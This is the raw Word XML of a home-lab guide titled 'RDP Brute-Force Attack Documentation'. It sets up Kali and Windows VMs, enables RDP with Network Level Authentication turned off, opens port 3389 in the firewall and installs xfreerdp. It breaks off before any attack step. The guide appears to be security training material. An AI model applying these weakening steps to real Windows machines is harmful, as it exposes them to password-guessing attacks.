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4847" w14:textId="388B0F83" w:rsidR="00520BB4" w:rsidRPr="00520BB4" w:rsidRDefault="00520BB4" w:rsidP="00F738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0BB4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>RDP Brute-Force Attack Documentation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="506BAE2C" w14:textId="7042C2C0" w:rsidR="00520BB4" w:rsidRPr="00520BB4" w:rsidRDefault="00520BB4" w:rsidP="00520BB4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00520BB4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> STEP 1: Network Setup in VirtualBox</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E05BAC8" w14:textId="77777777" w:rsidR="00520BB4" w:rsidRPr="00520BB4" w:rsidRDefault="00520BB4" w:rsidP="00520BB4">
      <w:pPr>
        <w:ind w:left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1.1 Configure Host-Only Adapter for both VMs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CDB5A9B" w14:textId="77777777" w:rsidR="00520BB4" w:rsidRPr="00520BB4" w:rsidRDefault="00520BB4" w:rsidP="00520BB4">
      <w:pPr>
        <w:ind w:left="720" w:firstLine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• Shutdown both VMs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="162FBEE2" w14:textId="0E4F986D" w:rsidR="00520BB4" w:rsidRPr="00520BB4" w:rsidRDefault="00520BB4" w:rsidP="00520BB4">
      <w:pPr>
        <w:ind w:left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• Go to VirtualBox → Select Kali VM → Settings → Network:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40BA9E05" w14:textId="77777777" w:rsidR="00520BB4" w:rsidRPr="00520BB4" w:rsidRDefault="00520BB4" w:rsidP="00520BB4">
      <w:pPr>
        <w:ind w:left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 xml:space="preserve">  - Adapter 1 → Enable Network Adapter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0380912D" w14:textId="41F5ECD8" w:rsidR="00520BB4" w:rsidRPr="00520BB4" w:rsidRDefault="00520BB4" w:rsidP="00520BB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20BB4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Set Attached to: Host-Only Adapter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E18554A" w14:textId="1419EF16" w:rsidR="00520BB4" w:rsidRPr="00520BB4" w:rsidRDefault="00520BB4" w:rsidP="00520BB4">
      <w:pPr>
        <w:ind w:left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(OR Internal Network, but both VMs must use the same mode)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="629B6FAE" w14:textId="12A51BBD" w:rsidR="00520BB4" w:rsidRPr="00520BB4" w:rsidRDefault="00520BB4" w:rsidP="00520BB4">
      <w:pPr>
        <w:ind w:left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 xml:space="preserve">Click Advanced → Set Adapter Type to: Intel PRO/1000 MT Desktop </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="715166AC" w14:textId="77777777" w:rsidR="00520BB4" w:rsidRPr="00520BB4" w:rsidRDefault="00520BB4" w:rsidP="00520BB4">
      <w:pPr>
        <w:ind w:left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• Repeat the same for Windows VM.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ADCC2ED" w14:textId="7B0422BE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1.2 Boot both machines</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="622EF468" w14:textId="66C8A1F8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• Start Kali Linux and Windows in VirtualBox.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19196593" w14:textId="1BE36451" w:rsidR="00520BB4" w:rsidRPr="00520BB4" w:rsidRDefault="00520BB4" w:rsidP="00520BB4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E6332B7" w14:textId="586E4351" w:rsidR="00520BB4" w:rsidRPr="00520BB4" w:rsidRDefault="00520BB4" w:rsidP="00520BB4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00520BB4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> STEP 2: Get IP Addresses</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E9D76C3" w14:textId="063E61FF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On Kali Linux, run:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79E20056" w14:textId="553D3E01" w:rsidR="00520BB4" w:rsidRPr="00520BB4" w:rsidRDefault="00520BB4" w:rsidP="00520BB4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520BB4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00520BB4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> a</w:t>
      </w:r>
      <w:r w:rsidRPr="00520BB4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520BB4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ifconfig</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6E33D9DA" w14:textId="28F453FF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Look for something like:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56396EB7" w14:textId="69D9CA57" w:rsid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 xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00520BB4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00520BB4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>inet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00520BB4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> 192.168.56.10</w:t>
      </w:r>
      <w:r w:rsidR="00F73837">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00520BB4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> (under eth</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00520BB4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>0 )</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="371A04AB" w14:textId="4047202C" w:rsidR="00F73837" w:rsidRDefault="00F73837" w:rsidP="00520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0339A44" wp14:editId="4460387B">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>30480</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>143510</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5943600" cy="2910840"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:wrapNone/>
            <wp:docPr id="73137808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78083" name="Picture 1" descr="A computer screen shot of a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4EB38" w14:textId="77777777" w:rsidR="00F73837" w:rsidRDefault="00F73837" w:rsidP="00520BB4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6DC199FE" w14:textId="77777777" w:rsidR="00F73837" w:rsidRDefault="00F73837" w:rsidP="00520BB4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="55210296" w14:textId="4570EC6E" w:rsidR="00F73837" w:rsidRDefault="00F73837" w:rsidP="00520BB4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F97930C" w14:textId="77777777" w:rsidR="00F73837" w:rsidRDefault="00F73837" w:rsidP="00520BB4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1510DE6A" w14:textId="77777777" w:rsidR="00F73837" w:rsidRDefault="00F73837" w:rsidP="00520BB4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52F982AA" w14:textId="77777777" w:rsidR="00F73837" w:rsidRDefault="00F73837" w:rsidP="00520BB4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0924DCF2" w14:textId="77777777" w:rsidR="00F73837" w:rsidRDefault="00F73837" w:rsidP="00520BB4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="113AEC00" w14:textId="1C7C8030" w:rsidR="00F73837" w:rsidRPr="00520BB4" w:rsidRDefault="00F73837" w:rsidP="00520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593952" w14:textId="77777777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lastRenderedPageBreak/>
        <w:t xml:space="preserve">On Windows, press Win + R, type: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00520BB4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00520BB4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> and run:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DF8ECA3" w14:textId="77777777" w:rsidR="00520BB4" w:rsidRPr="00520BB4" w:rsidRDefault="00520BB4" w:rsidP="00520BB4">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00520BB4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ipconfig</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="719AE7C7" w14:textId="77777777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Look for:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EBAB0D5" w14:textId="3E0A494A" w:rsidR="00520BB4" w:rsidRDefault="00520BB4" w:rsidP="00520BB4">
      <w:pPr>
        <w:ind w:firstLine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 xml:space="preserve">IPv4 Address. . . . . . </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00520BB4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>. . . .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00520BB4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00520BB4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>. :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00520BB4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> 192.168.56.10</w:t>
      </w:r>
      <w:r w:rsidR="00F73837">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="302F89AB" w14:textId="7A071840" w:rsidR="00F73837" w:rsidRDefault="00F73837" w:rsidP="00520BB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D14BC76" wp14:editId="3C222655">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>53340</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>137795</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5943600" cy="3096260"/>
            <wp:effectExtent l="0" t="0" r="0" b="8890"/>
            <wp:wrapNone/>
            <wp:docPr id="1799540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401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50B8B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68326D06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7A1B6341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445CE6F8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4680A481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6BEF6E80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50E5CA50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0572517B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2DCC62C9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520DF7DC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5037A334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20B5E175" w14:textId="77777777" w:rsidR="00F73837" w:rsidRDefault="00F73837" w:rsidP="00520BB4">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46EEA5F3" w14:textId="77777777" w:rsidR="00F73837" w:rsidRPr="00520BB4" w:rsidRDefault="00F73837" w:rsidP="00520BB4">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24A4F0CF" w14:textId="7A2B9432" w:rsidR="00520BB4" w:rsidRPr="00520BB4" w:rsidRDefault="00520BB4" w:rsidP="00520BB4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00520BB4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>STEP 3: Enable RDP on Windows VM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66B70898" w14:textId="4FDBC47B" w:rsidR="00520BB4" w:rsidRPr="00520BB4" w:rsidRDefault="00520BB4" w:rsidP="00520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20BB4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Enable RDP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16D18F6E" w14:textId="77777777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Press Win + R, run:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00782B22" w14:textId="77777777" w:rsidR="00520BB4" w:rsidRPr="00520BB4" w:rsidRDefault="00520BB4" w:rsidP="00520BB4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00520BB4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SystemPropertiesRemote</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1D1B655C" w14:textId="3D0D7302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• Check:  Allow remote connections to this computer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F0C4221" w14:textId="4801E2C7" w:rsid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• Uncheck</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00520BB4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>:  “</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00520BB4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Allow connections only from computers running Remote Desktop with NLA”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="335F3546" w14:textId="2F24C406" w:rsidR="00377D4E" w:rsidRDefault="00377D4E" w:rsidP="00520BB4">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B190F1E" w14:textId="5895C6FC" w:rsidR="00377D4E" w:rsidRDefault="00377D4E" w:rsidP="00520BB4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="584F9077" w14:textId="77777777" w:rsidR="00520BB4" w:rsidRDefault="00520BB4" w:rsidP="00520BB4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D80FB7A" w14:textId="28D26DF0" w:rsidR="00377D4E" w:rsidRDefault="00F73837" w:rsidP="00520BB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63B2C9" wp14:editId="7549212B">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>812800</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>-482601</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3933825" cy="4270163"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="137563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3852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"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3934407" cy="427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53908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2C11D7D1" w14:textId="286E4178" w:rsidR="00377D4E" w:rsidRDefault="00377D4E" w:rsidP="00520BB4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37A23B62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03E532E8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1AD376EF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6A58B468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77ACD336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0EF4AD40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348899F6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1AD15275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3909B1E4" w14:textId="77777777" w:rsidR="00377D4E" w:rsidRDefault="00377D4E" w:rsidP="00520BB4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04A83EFA" w14:textId="77777777" w:rsidR="00F73837" w:rsidRDefault="00F73837" w:rsidP="00520BB4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08CDACC1" w14:textId="77777777" w:rsidR="00377D4E" w:rsidRPr="00520BB4" w:rsidRDefault="00377D4E" w:rsidP="00520BB4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5950E6B6" w14:textId="01B4D50A" w:rsidR="00520BB4" w:rsidRPr="00520BB4" w:rsidRDefault="00520BB4" w:rsidP="00520BB4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00520BB4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>STEP 4: Allow RDP in Windows Firewall</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FAFBFDE" w14:textId="77777777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Open Command Prompt (as admin) and run:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="646062C4" w14:textId="77777777" w:rsidR="00520BB4" w:rsidRDefault="00520BB4" w:rsidP="00415E11">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00520BB4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>netsh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00520B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0BB4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>advfirewall</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00520BB4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> firewall add rule name="Allow RDP" </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00520BB4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>dir</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00520BB4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">=in action=allow protocol=TCP </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00520BB4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>localport</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00520BB4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>=3389</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46509637" w14:textId="77777777" w:rsidR="00520BB4" w:rsidRPr="00520BB4" w:rsidRDefault="00520BB4" w:rsidP="00520BB4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60B9DF1B" w14:textId="4D279D6E" w:rsidR="00520BB4" w:rsidRPr="00520BB4" w:rsidRDefault="00520BB4" w:rsidP="00520BB4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00520BB4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> STEP 5: Test RDP Connection from Kali</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55B0E9D8" w14:textId="77777777" w:rsidR="00520BB4" w:rsidRPr="00520BB4" w:rsidRDefault="00520BB4" w:rsidP="00415E11">
      <w:pPr>
        <w:ind w:firstLine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 xml:space="preserve">5.1 </w:t>
      </w:r>
      <w:r w:rsidRPr="00520BB4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Install </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00520BB4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>xfreerdp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7F07F7E7" w14:textId="77777777" w:rsidR="00520BB4" w:rsidRPr="00520BB4" w:rsidRDefault="00520BB4" w:rsidP="00415E11">
      <w:pPr>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00520BB4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00520BB4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> apt update</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FBE6375" w14:textId="7C70CA7A" w:rsidR="00520BB4" w:rsidRDefault="00520BB4" w:rsidP="00415E11">
      <w:pPr>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00520BB4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00520BB4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> apt install freerdp2-x11</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="480FF440" w14:textId="77777777" w:rsidR="00F73837" w:rsidRPr="00520BB4" w:rsidRDefault="00F73837" w:rsidP="00415E11">
      <w:pPr>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10403CE5" w14:textId="5C6D714C" w:rsidR="00520BB4" w:rsidRPr="00377D4E" w:rsidRDefault="00520BB4" w:rsidP="00520BB4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00377D4E">
        <w:rPr>
